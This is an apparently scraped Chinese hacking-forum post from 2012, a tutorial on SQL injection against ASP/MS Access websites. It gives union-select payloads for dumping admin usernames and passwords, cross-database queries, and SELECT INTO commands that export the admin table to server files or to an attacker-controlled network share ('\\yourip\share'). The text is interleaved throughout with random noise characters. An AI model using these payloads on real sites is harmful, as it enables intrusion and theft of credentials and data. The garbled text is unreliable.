--------------------------------------------------------------2 |4 p9 @7 {4 l$ S3 }/ |
union查询法
6 }4 F$ Q! `7 T" U1 A; k首先要说的就是查询办法,一般的查询办法就是
9 E z) U7 i/ Y4 n0 L2 T' q! r+ }$ t
5 Q. ^. F5 N+ O程序代码9 X7 J" T K* ?: L ?# M2 B& m
and 1=(select count(*) from admin where left(id,1)='1')
6 e; Y# w2 [* e( ]* ?7 I% B
, g+ J# v; [- R* R: z这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯., L- @- Z( J7 u( L
所以这个时候,union select横空出现.别以为只能在PHP里用哦...* ^7 I# D' y4 a( l( a @5 U
譬如你有一个ACCESS点:8 ^; F9 S4 W" i! E4 K
程序代码, u W1 V/ I' X, T2 S! [, Q
http://bbs.tian6.com/xiaoyang.asp?coder=1
6 `$ T4 v( ~1 \3 c- h- j/ {% c
+ |7 p; Z5 O' r知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
0 f+ ^7 h! E! `3 x2 y+ q然后我们直接来:
* t# P( h; ^8 K* w' h& ^程序代码$ Y* h S* p1 j; l% q# e
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
5 V: o1 E) r0 p3 r# [5 I# ^- Z3 O7 N8 \8 Q
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了./ C5 w4 l+ p9 Z' \$ f, T) ?
( I3 A, Z) C. }% z6 ^/ A2 e+ o( g* v4 {2 n U$ F+ v2 `0 S t
/ O' c+ P2 j! X/ y$ w---------------------------------------------------------------2 G6 K% w+ \4 n
Access跨库查询5 K6 H6 H/ i& E- y( i# }$ z* c: r
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
8 o+ c; o% q) ^1 n( x* i跨库的查询语句:" c3 ]' C5 Z# j$ A! R; I' [& {+ Y
子查询:
! w5 b6 J' {0 ~. N; x/ ~8 @程序代码/ {6 C. V' }4 b* q2 K
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
+ @: X) b' C. N; G6 p5 v) l* X* p8 g: O7 Y3 }; s( h* T
union查询:$ n) C4 y- |* p6 w& f1 L" `2 w, T+ Z
程序代码
0 K* _9 s% ]4 p. Hunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
/ q _9 u* E$ D3 D9 H" ~+ h. L6 N6 d; q1 l
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
: C$ z+ K& k3 \* ~2 q; m6 N% y程序代码1 o2 C3 H/ T! |7 u5 j: o3 j+ h* J
http://www.4ngel.net/article/46.htm ( r" E) h9 ~& j8 F7 h
http://hf110.com/Article/hack/rqsl/200502/66.html4 u1 N9 W& a6 [7 O2 d$ @
. [9 e% ?& t U$ i( `---------------------------------------------------------------
4 | c) r4 E; O2 [# q+ S9 FAccess注入,导出txt,htm,html9 @9 k+ d- ?0 |- B+ Q" }
子查询语句:
) x6 A5 m1 m* h0 K- {程序代码
8 q! j3 @0 z0 f, zSelect * into [test.txt] in 'd:\web\' 'text;' from admin2 S7 N0 r, x" S# H- y# w( ]7 Q N, u* {
* e! l! t6 S( J' \! ?" P0 f这样就把admin表的内容以test类型存进了d:\web里面.6 a* [! K' ]- P# r
UNION查询:( d( y0 h' h8 C: _$ ^
程序代码
) v$ u% o0 e4 ], z) n/ t |union select * into [admin.txt] in 'c:\' 'test;' from admin
8 [+ z! N4 }' g' \" G) Q+ m
1 d* W" p0 q" m U5 D0 Z C而且这里也可以保存到本地来:1 Y/ h- h8 j0 j
程序代码9 `1 l( J4 Q( }) D; [
Select * into [test.txt] in '\\yourip\share' 'text;' from admin
* t6 ~ J) v& }$ Q2 D0 d3 W7 `$ R' C4 e8 t# n0 K$ u! k7 c7 O0 ]6 p
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:6 }1 a y3 t$ b. w. U1 \; X
; h7 i- N- T! {) \
程序代码
, g9 b" A* q1 ?- _- y5 F3 c' u5 b2 ghttp://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
) f2 j8 t$ }$ _5 `- H9 p% g2 D6 }; R0 {5 O+ ~+ I/ X
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
?) l/ i; J+ N4 G |
发表于 2012-9-15 14:20:57
收藏
支持
反对